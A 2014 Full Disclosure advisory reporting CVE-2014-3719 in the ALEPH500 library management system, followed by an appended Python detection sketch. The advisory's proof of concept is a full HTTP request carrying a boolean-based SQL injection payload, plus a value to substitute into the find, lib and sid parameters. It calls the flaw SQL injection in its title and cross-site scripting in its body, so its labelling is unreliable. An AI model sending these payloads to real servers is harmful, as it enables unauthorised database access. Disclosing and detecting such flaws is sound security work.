[FD] [CVE-2014-3719] ALEPH500 (Integrated library management system) SQL Injection
- To: "fulldisclosure"<fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] [CVE-2014-3719] ALEPH500 (Integrated library management system) SQL Injection
- From: "shady.liu"<shady.liu@xxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 15 May 2014 16:30:38 +0800
Greetings:

I found on a ALEPH500 (Integrated library management system) Cross Site Scripting; CVE-ID is CVE-2014-3719.

Aleph 500, fully meet the industry standard, is an art class perfect library solution, the Ex Libris to pursue the essence of philosophy is flexible and easy to use. Ex Libris is the world leader in the field of Library and information center of development of high performance application system. Aleph 500, with Oracle database as a background, fully support the Unicode character set, support XML management report, and links to other top application system of API, is a pioneer in the field of Library automation. With more than 20 years of development experience, through the design of the four generation Aleph system, Ex Libris is already in the world won a number of loyal customers, at present, there are already more than 1250 sets of Aleph system was installed in 51 countries and regions of the library and Museum within the coalition.

Software Description
=====================
The Aleph 500 system is a set of functional integrity of the integrated library automation system, is Israel's Ex Libris (Eli Beth Co.) developed the fifth generation of products.

Vulnerability Description
=========================
Vulnerability title: Multiple Persistent Cross Site Scripting ALEPH 500 (CVE-2014-3719)
CVE: CVE-2014-3719
Vendor: Israeli Ex Libris (Eli Beth Co.) development
Product: Israeli Ex Libris (Eli Beth Co.) development ALEPH500 (Integrated library management system)
Affected version: 18.1, 20
Fixed version: ALEPH 500
Author: Shady.liu
URL: http://[domain]/cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000Andz
Affected parameter(s): find, lib, sid

HTTP REQUEST
GET /cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000Andz HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://host:8991/F?func=find-m&find_code=WTI&FIND_BASE=BGD09&FIND_BASE=BGD01&FIND_BASE=BGD03&FIND_BASE=BGD07&request=
Host: host:8991
Connection: Keep-alive
Accept-Encoding: gzip,deflate

Replace "find, lib, sid" parameter value with "' AND 6012=6012 AND 'SM'='SM"

Tools used: Mozilla Firefox browser

CISP COBIT OWASP ITIL

DBAppSecurity Co.Ltd.
-------------------------------------------------------------------------

Email:Shady.liu@xxxxxxxxxxxxxxxxxxxx
----------------------------------------------------------
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
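
A detection sketch for the request pattern shown in the advisory above, added here as an example and not part of the original post or of any vendor code. It URL-decodes the affected parameters (find, lib, sid), replaces /**/ comments with spaces, and flags a closing quote followed by a boolean comparison of two literals; the function names, the regular expression and the second and third sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as affected.
WATCHED = {"find", "lib", "sid"}

# The advisory's request uses inline SQL comments in place of spaces.
COMMENT = re.compile(r"/\*.*?\*/", re.S)

# A quote, then AND/OR, then a comparison of two literals (quoted strings or
# integers), e.g.  ' AND 6012=6012  or  ' AND '000Andz'='000Andz
BOOLEAN_TEST = re.compile(
    r"'\s*(?:and|or)\s+('[^']*'|\d+)\s*=\s*('[^']*'?|\d+)", re.I)

# Sample request lines: the first is the advisory's request, the second is
# constructed from its replacement value, the third is a constructed benign hit.
SAMPLES = [
    "GET /cgi-bin/review_m.cgi?docnum=000421742&getreview=1"
    "&lib=BGD01'/**/AND/**/'000Andz'%3d'000Andz HTTP/1.1",
    "GET /F?func=find-m&find=x'%20AND%206012=6012%20AND%20'SM'='SM HTTP/1.1",
    "GET /cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01 HTTP/1.1",
]


def normalize(value: str) -> str:
    """Replace SQL comments with a space and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", COMMENT.sub(" ", value)).strip()


def suspicious_params(request_line: str) -> list[str]:
    """Return the watched parameters whose decoded value looks like a boolean probe."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    hits = []
    # parse_qsl percent-decodes values, so %3d is seen as '='.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in WATCHED and BOOLEAN_TEST.search(normalize(value)):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for line in SAMPLES:
        print(suspicious_params(line), line[:60])
```

The check is a heuristic for log triage or a filtering rule, not a replacement for bound parameters in the application's queries.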